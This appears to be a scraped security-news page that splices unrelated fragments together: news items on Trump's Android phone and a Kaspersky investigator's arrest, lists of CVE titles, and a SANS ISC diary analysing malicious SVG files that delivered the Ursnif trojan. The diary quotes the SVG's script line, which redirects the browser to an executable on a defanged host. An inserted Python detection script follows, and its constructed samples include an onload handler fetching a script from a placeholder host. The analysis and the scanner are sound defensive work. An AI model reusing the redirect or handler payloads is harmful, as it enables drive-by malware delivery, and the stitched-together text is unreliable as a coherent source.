(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The Samsung Galaxy S7 and S7 Edge, Samsung's most recent (non-exploding) flagship smartphones. (credit: Ron Amadeo)

Donald Trump continues to use his "old, unsecured Android phone" since taking office despite "the protests of some of his aides," according to a report from The New York Times about how the new president is settling in to his routine. This contradicts another report from late last week that indicated Trump had given up the phone in exchange for a "secure, encrypted device approved by the Secret Service."

It's not clear exactly what kind of Android phone Trump uses—he has previously indicated that it's a Samsung Galaxy device—or whether it has also been encrypted or otherwise hardened or what kinds of things he uses it for. Samsung's Knox software is approved for "sensitive but unclassified use" by the US Department of Defense, so these phones are cleared for at least some kinds of government work when configured correctly.

How big of a deal is this? We don't know anything about the phone's configuration, but the state of Android security is notoriously poor compared to other operating systems like iOS or Windows, both of which are patched regularly by Apple and Microsoft with no interference from hardware manufacturers or wireless carriers. Google releases monthly security updates for Android, and Samsung is better than most about actually releasing those updates to its most recent devices (flagship phones tend to get monthly updates, midrange phones and most tablets get quarterly patches), but there is still often a gap of several days or weeks between when those security bulletins are published and when the patches are available.


Cisco Adaptive Security Appliance CX Context-Aware Security Denial of Service Vulnerability

In a move that stunned some security researchers, a top investigator at Russia's largest antivirus provider, Kaspersky Lab, has been arrested in an investigation into treason, a crime that upon conviction can carry severe sentences.

Ruslan Stoyanov (credit: Kaspersky Lab)

Ruslan Stoyanov, the head of Kaspersky Lab's investigations unit, was arrested in December, Russian newspaper Kommersant reported Wednesday. The paper said that Sergei Mikhailov, a division head of the Russian intelligence service FSB, was also arrested in the same probe. Stoyanov joined the Moscow-based AV company in 2012 and was chiefly involved in investigating and responding to hacking-related crimes carried out in Russia. His LinkedIn profile shows he served as a major in the cybercrime unit of Russia's Ministry of Interior from 2000 to 2006.

"The case against this employee does not involve Kaspersky Lab," company officials wrote in a statement issued following the report. "The employee, who is Head of the Computer Incidents Investigation Team, is under investigation for a period predating his employment at Kaspersky Lab. We do not possess details of the investigation. The work of Kaspersky Lab's Computer Incidents Investigation Team is unaffected by these developments."


systemd CVE-2016-10156 Local Privilege Escalation Vulnerability
TigerVNC CVE-2017-5581 Buffer Overflow Vulnerability
Cisco Expressway Series and Cisco TelePresence VCS CVE-2017-3790 Denial of Service Vulnerability
Virglrenderer CVE-2017-5580 Denial of Service Vulnerability
QEMU CVE-2017-5579 Denial of Service Vulnerability
Cisco TelePresence Multipoint Control Unit CVE-2017-3792 Remote Code Execution Vulnerability
QEMU CVE-2016-10163 Denial of Service Vulnerability
PHP CVE-2016-10160 Remote Code Execution Vulnerability
IBM PowerKVM CVE-2016-7076 Local Command Execution Vulnerability
QEMU 'virtio-gpu.c' Denial of Service Vulnerability
Support-Project Knowledge CVE-2017-2097 Unspecified Cross-Site Request Forgery Vulnerability
smalruby-editor CVE-2017-2096 OS Command Injection Vulnerability
QEMU 'virtio-gpu-3d.c' Denial of Service Vulnerability
IBM Forms Experience Builder CVE-2016-6001 Server Side Request Forgery Security Bypass Vulnerability
Nessus CVE-2016-9260 HTML Injection Vulnerability
PHP CVE-2016-10159 Integer Overflow Vulnerability
QEMU CVE-2016-10155 Denial of Service Vulnerability
Mozilla Firefox Multiple Security Vulnerabilities
Linux Kernel CVE-2017-5576 Integer Overflow Vulnerability
PHP CVE-2016-10161 Denial of Service Vulnerability
Schneider Electric Wonderware CVE-2017-5155 Historian Insecure Default Password Vulnerability
Linux Kernel CVE-2017-5577 Remote Buffer Overflow Vulnerability
OpenCart CSRF - User Account Takeover
PHP 'wddx.c' NULL Pointer Dereference Denial of Service Vulnerability
Mozilla Firefox CVE-2017-5373 Multiple Unspecified Memory Corruption Vulnerabilities
Mozilla Firefox CVE-2017-5377 Memory Corruption Vulnerability
Apple iTunes/iCloud/Safari/iOS CVE-2017-2366 Multiple Memory Corruption Vulnerabilities
Webkit CVE-2017-2371 Security Bypass Vulnerability
phpMyAdmin Incomplete Fix PMASA-2017-5 Security Bypass Vulnerability
phpMyAdmin PMASA-2017-6 Server Side Request Forgery Security Bypass Vulnerability
Mozilla Firefox CVE-2017-5374 Multiple Memory Corruption Vulnerabilities

In November 2016, the Facebook Messenger application was used to deliver malicious SVG files to people [1]. SVG (Scalable Vector Graphics) files are vector images that can be displayed in most modern browsers (natively or via a specific plugin). More precisely, Internet Explorer 9 supports the basic SVG feature set and IE10 extended that with SVG 1.1 support. On Microsoft Windows, SVG files are opened by Internet Explorer by default.

From a file format point of view, SVG files are XML-based and can be viewed and edited with a regular text editor. Amongst all the specifications of the SVG format, we can read this one in the W3C recommendation [2]:

All aspects of an SVG document can be accessed and manipulated using scripts in a similar way to HTML. The default scripting language is ECMAScript (closely related to JavaScript) and there are defined Document Object Model (DOM) objects for every SVG element and attribute. Scripts are enclosed in <script> elements.

As you can see, attackers have all the requirements to build malicious SVG files. A few days ago, I captured two samples via my honeypot:

  • 00967999543-(02).svg (MD5:6b9649531f35c7de78735aa45d25d1a7)
  • P0039988439992_001.jpg.svg (MD5:e2f7245d016c52fc9c56531e483e6cfb)

Those two pictures belong [...] The SVG file has the following structure (the base64 image data and most of the script body are elided):

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
      <image width="1000" height="900" xlink:href="base64, ... ... ..." />
      <script type="application/javascript">
      ... ... ...]]>
      </script>
    </svg>

The image is only a decoy; the script element is what matters. It redirects the viewer's browser to an executable (URL defanged):

    setTimeout(function () { window.location.href = "hxxp://juanpedroperez.com/fotos/photos/xfs_extension.exe" ...

The PE file is no longer available at the location above, but here is a link [3] to the sample (it was an Ursnif banking Trojan [4]). The malicious SVG file is, of course, delivered inside a ZIP archive. At the moment, those two malicious files are detected by most antivirus products, but other waves may be launched. Keep an eye on this file format: it is one more file extension to take care of, and note the double extension (.jpg.svg) used to make the second sample look like a photo.
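An added triage script (not part of the diary, and not the handler's code) that parses an SVG with the Python standard library and reports the active-content features described above. It goes a little beyond the captured sample: besides the <script> element and the URL of the dropped executable, it also flags on* event-handler attributes, javascript: hrefs and external references, which the same SVG scripting model allows, and it checks for the .jpg.svg double-extension trick. All SVG samples and hostnames in it are constructed for the example; none of the real payload is reproduced.

```python
# Added triage script: flags active content in SVG files. The sample files
# below are constructed for this example and only mimic the structure of the
# captured file (placeholder image, harmless example.invalid hostnames).
import re
import xml.etree.ElementTree as ET

# Same skeleton as the captured SVG, with a placeholder image and hostname.
SAMPLE_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <image width="1000" height="900" xlink:href="data:image/png;base64,iVBORw0KGgo="/>
  <script type="application/javascript"><![CDATA[
    setTimeout(function () { window.location.href = "http://example.invalid/photos/xfs_extension.exe"; }, 1000);
  ]]></script>
</svg>
"""

# Constructed variant with no <script> at all, but an onload handler and a
# javascript: link, which execute just the same when the image is rendered.
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="window.open('http://example.invalid/x.js')">
  <a xlink:href="javascript:alert(1)"><rect width="10" height="10"/></a>
</svg>
"""

CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>"""

URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.IGNORECASE)
EXEC_EXT = (".exe", ".scr", ".js", ".vbs", ".hta", ".jar", ".ps1", ".bat", ".cmd")
DISGUISE_RE = re.compile(r"\.(jpe?g|png|gif|bmp|pdf|docx?|xlsx?)\.svg$", re.IGNORECASE)


def strip_ns(name: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1]


def is_disguised_name(filename: str) -> bool:
    """True for double extensions such as photo.jpg.svg."""
    return DISGUISE_RE.search(filename) is not None


def triage_svg(data: bytes) -> dict:
    """Parse an SVG and return its active-content findings and a verdict."""
    # expat does not fetch the external DTD named in the DOCTYPE, so parsing
    # the file does not itself reach out to the network.
    root = ET.fromstring(data)
    found = {"scripts": [], "event_handlers": [], "external_refs": [], "urls": set()}
    for el in root.iter():
        tag = strip_ns(el.tag)
        if tag == "script":
            body = (el.text or "").strip()
            found["scripts"].append(body)
            found["urls"].update(URL_RE.findall(body))
        for attr, value in el.attrib.items():
            name = strip_ns(attr).lower()
            if name.startswith("on"):  # onload=, onclick=, onbegin=, ...
                found["event_handlers"].append((tag, name, value))
                found["urls"].update(URL_RE.findall(value))
            elif name == "href":
                v = value.strip().lower()
                if v.startswith("javascript:"):
                    found["event_handlers"].append((tag, name, value))
                elif not v.startswith(("data:", "#")):
                    found["external_refs"].append((tag, value))
                    found["urls"].update(URL_RE.findall(value))
    found["urls"] = sorted(found["urls"])
    # URLs that point at something executable are the likely dropper stage.
    found["dropper_urls"] = [u for u in found["urls"]
                             if u.lower().split("?", 1)[0].endswith(EXEC_EXT)]
    active = found["scripts"] or found["event_handlers"]
    found["verdict"] = "suspicious" if active else "clean"
    return found


if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_SVG), ("handler", HANDLER_SVG), ("clean", CLEAN_SVG)):
        r = triage_svg(blob)
        print(label, r["verdict"], r["dropper_urls"], r["event_handlers"])
    print("P0039988439992_001.jpg.svg disguised:", is_disguised_name("P0039988439992_001.jpg.svg"))
```

Anything with a "suspicious" verdict deserves a closer look at the script body before the file is opened in a browser; a clean verdict only says the file carries no script, handlers or javascript: links, not that the referenced external resources are harmless. For files arriving inside ZIP archives, as in this campaign, run is_disguised_name over the member names before extracting.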


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


Mozilla Firefox CVE-2017-5376 Denial of Service Vulnerability
Mozilla Firefox CVE-2017-5375 ASLR and DEP Security Bypass Vulnerability
Quagga CVE-2017-5495 Denial of Service Vulnerability
ImageMagick CVE-2016-10146 Local Information Disclosure Vulnerability
[security bulletin] HPSBST03642 rev.3 - HPE StoreVirtual Products running LeftHand OS using OpenSSL and OpenSSH, Remote Arbitrary Code Execution, Denial of Service (DoS), Disclosure of Sensitive Information, Unauthorized Access
[security bulletin] HPSBHF03695 rev.1 - HPE Ethernet Adaptors, Remote Denial of Service (DoS)
[security bulletin] HPSBHF03441 rev.2 - HPE iLO 3, iLO 4 and iLO 4 mRCA, Remote Multiple Vulnerabilities